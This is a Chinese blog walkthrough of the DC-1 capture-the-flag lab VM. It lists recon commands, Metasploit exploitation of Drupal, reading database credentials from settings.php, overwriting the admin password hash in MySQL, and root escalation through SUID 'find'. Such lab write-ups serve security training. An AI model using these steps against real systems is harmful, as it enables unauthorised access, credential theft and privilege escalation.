【DC1靶场通关详细记录】

环境搭建

  1. 准备好VMware和kali虚拟机
  2. 下载dc1靶场

https://www.five86.com/downloads.html

  1. 导入dc1靶场报错:直接重试即可

image.png

  1. kali和dc1靶场统一网络连接模式(桥接或NET)

image.png

信息收集

目标主机发现

arp-scan -l

image.png

扫描目标端口及服务

nmap -sV -p- -A 192.168.112.128

image.png

目标网站指纹识别

whatweb -v http://192.168.112.128

image.png

目标网站目录爆破

dirsearch -u 192.168.112.128

image.png
image.png
image.png
image.png
image.png
image.png
image.png
image.png
image.png
image.png

漏洞查找与利用

漏洞扫描

nikto -h 192.168.112.128 -o dc1.txt

image.png

漏洞查找

  • 访问网站可用目录查看敏感信息
    • 主站首页登录框

image.png

  • 静态文件目录泄露

image.png

  • 查找CMS相关漏洞
    • 查找相关CMS是否存在漏洞,可能存在sql注入、远程命令执行等漏洞

image.png

漏洞利用

msf漏洞利用
  1. 搜索相关模块,使用相关模块

search drupal
use 1

image.png

  1. 对模块进行配置

show option
set rhosts 192.168.112.128
run

image.png
image.png

  1. 通过msf进行漏洞利用获取到目标机的shell

查找flag

flag1

  1. 获取shell后进行简单的信息收集

sysinfo

image.png

  1. 进入shell,使用python开启交互式终端

python -c “import pty;pty.spawn(‘/bin/bash’)”

image.png

  1. 查看当前目录下的文件,找到flag1

ls
cat flag1.txt

image.png
flag1提示CMS的配置文件

  1. 从网上搜索得知配置文件

image.png

flag2

  1. 通过查看配置文件内容得到mysql数据库的账号密码,找到flag2

cat ./sites/default/settings.php

image.png
image.png

  1. flag2提示字典攻击密码爆破无用,获取相关权限
  2. 通过shell连接mysql数据库

image.png

  1. 查看数据库内容

show databases;
use drupaldb

image.png

  1. 查看表内容

show tables;

image.png

  1. 查看表内容得到了管理员账号和加密密码

select * from users\G
加密方式大概是hash加密

image.png

  1. 退出数据库,查找加密脚本

quit
find . -name ‘*password*’

image.png

  1. 使用脚本加密密码

./scripts/password-hash.sh 123456

image.png

  1. 重新连接数据库更新admin的密码为使用脚本加密后的密码

mysql -udbuser -pR0ck3t
show databases;
use drupaldb

update users set pass='$S$DFTjE6MQfJJx3er.iWGVcIIZD8XvaFmGM.F7ZiDbPlxpC./1X/HC'where name="admin";

image.png

flag3

  1. 使用更改后的admin的密码登录网站

image.png

  1. 登录网站检查功能点

image.png

  1. 发现flag3

image.png

  1. flag3提示

image.png

flag4

  1. 通过提示大概是需要提权
  2. 检查当前环境中是否还有其它flag文件

find / -name ‘*flag*’

image.png

  1. flag4位置

image.png

thefinalflag

  1. 尝试suid提权

find / -perm -u=s -type f 2>/dev/null

image.png

  1. 通过提权网站查找能够使用suid提权的文件

image.png

  1. 尝试提权后不成功

sudo install -m =xs $(which find)
./find . -exec /bin/sh -p ; -quit
sudo -l
find . -exec /bin/bash ;

image.png

  1. 尝试切换到flag4的目录下进行提权操作

cd /home/flag4
find / -perm -u=s -type f 2>/dev/null
find / -exec “/bin/bash” -p ;
whoami

image.png

  1. 最后的flag

cd /root
ls
cat thefinalflag.txt

image.png

总结

  1. 使用msf直接对CMS的漏洞进行攻击
  2. 数据库密码加密的脚本可能存储在系统文件中(一般不会存储在系统中)
  3. MySQL数据库更改密码语句update users set pass='加密后密码内容' where name="admin";
  4. find的suid提权方法find / -exec "/bin/bash" -p \;
  • 25
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榕小树

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值